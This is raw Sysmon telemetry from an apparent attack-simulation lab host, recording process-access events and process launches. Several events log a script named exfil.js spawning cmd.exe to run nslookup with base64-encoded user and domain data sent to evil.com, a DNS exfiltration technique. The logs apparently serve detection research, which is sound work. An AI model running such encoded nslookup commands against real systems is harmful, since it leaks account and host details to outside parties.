14:16:40.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7F41-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.607{2E1864BB-17A1-629A-783D-000000005F02}55527756C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7F41-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.608{2E1864BB-17C8-629A-7F41-000000005F02}6604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljqr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.591{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzix.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-17C8-629A-7D41-000000005F02}60127544C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7E41-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7E41-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.575{2E1864BB-17C8-629A-7C41-000000005F02}54081432C:\Windows\system32\cmd.exe{2E1864BB-17C8-629A-7E41-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.582{2E1864BB-17C8-629A-7E41-000000005F02}7868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C8-629A-7C41-000000005F02}5408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzix.tmp 2>&1 10341000x8000000000000000203025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.560{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7D41-000000005F02}6012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.560{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C8-629A-7D41-000000005F02}6012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.544{2E1864BB-17C8-629A-7D41-000000005F02}60127544C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7C41-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.544{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7D41-000000005F02}6012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.539{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C8-629A-7C41-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.539{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.539{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.539{2E1864BB-17A1-629A-783D-000000005F02}55527712C:\Windows\System32\WScript.exe{2E1864BB-17C8-629A-7C41-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.538{2E1864BB-17C8-629A-7C41-000000005F02}5408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzix.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.522{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlykdy.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-17C8-629A-7A41-000000005F02}71527240C:\Windows\system32\conhost.exe{2E1864BB-17C8-629A-7B41-000000005F02}1716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.507{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 